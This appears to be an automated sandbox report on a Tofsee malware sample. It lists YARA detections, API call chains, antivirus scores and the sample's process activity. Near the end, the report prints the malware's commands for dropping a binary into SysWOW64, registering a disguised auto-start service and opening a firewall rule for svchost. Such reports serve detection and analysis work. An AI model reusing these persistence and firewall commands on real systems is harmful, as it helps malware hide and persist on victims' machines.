Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: svchost.exe, 0000001E.00000003.395628305.000001D6C5970000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
            Source: svchost.exe, 0000001E.00000003.395628305.000001D6C5970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals 
www.twitter.com (Twitter)
            Source: svchost.exe, 0000001E.00000003.395641545.000001D6C5981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.395628305.000001D6C5970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO",
"SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-06-23T07:49:46.8854719Z||.||e8626b3b-46b9-4258-ba94-c96e93c8d7ab||1152921505694968416||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
            Source: svchost.exe, 0000001E.00000003.395641545.000001D6C5981000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.395628305.000001D6C5970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO",
"SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-06-23T07:49:46.8854719Z||.||e8626b3b-46b9-4258-ba94-c96e93c8d7ab||1152921505694968416||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

            Spam, unwanted Advertisements and Ransom Demands

            Source: Yara match | File source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: OcmKX57vR7.exe PID: 6360, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: pjzcupje.exe PID: 6792, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6936, type: MEMORYSTR

            System Summary

            Source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 0.3.OcmKX57vR7.exe.af0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 13.3.pjzcupje.exe.b50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 13.2.pjzcupje.exe.b30e67.1.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
            Source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Tofsee Author: ditekSHen
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_0040C913
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00418810
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00427420
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_004195F0
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Code function: 13_2_0040C913
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Code function: 13_2_00418810
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Code function: 13_2_00427420
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Code function: 13_2_004195F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0251C913
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError
            Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: windowscoredeviceinfo.dll
            Source: OcmKX57vR7.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.3.OcmKX57vR7.exe.af0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.3.pjzcupje.exe.b50000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0.2.OcmKX57vR7.exe.ad0e67.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 13.2.pjzcupje.exe.b30e67.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
            Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\ghrubsm\
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: String function: 0040EE2A appears 40 times
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: String function: 00402544 appears 53 times
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: String function: 00AD27AB appears 36 times
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle
            Source: OcmKX57vR7.exe | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
            Source: OcmKX57vR7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess | graph_0-28013
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess | graph_13-19843
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@37/6@5/4
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Code function: 13_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,LoadLibraryA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_02519A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep
            Source: OcmKX57vR7.exe | Virustotal: Detection: 49%
            Source: OcmKX57vR7.exe | Metadefender: Detection: 45%
            Source: OcmKX57vR7.exe | ReversingLabs: Detection: 84%
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | File read: C:\Users\user\Desktop\OcmKX57vR7.exe
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Users\user\Desktop\OcmKX57vR7.exe "C:\Users\user\Desktop\OcmKX57vR7.exe"
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support
            Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conection
            Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ghrubsm
            Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d"C:\Users\user\Desktop\OcmKX57vR7.exe"
            Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
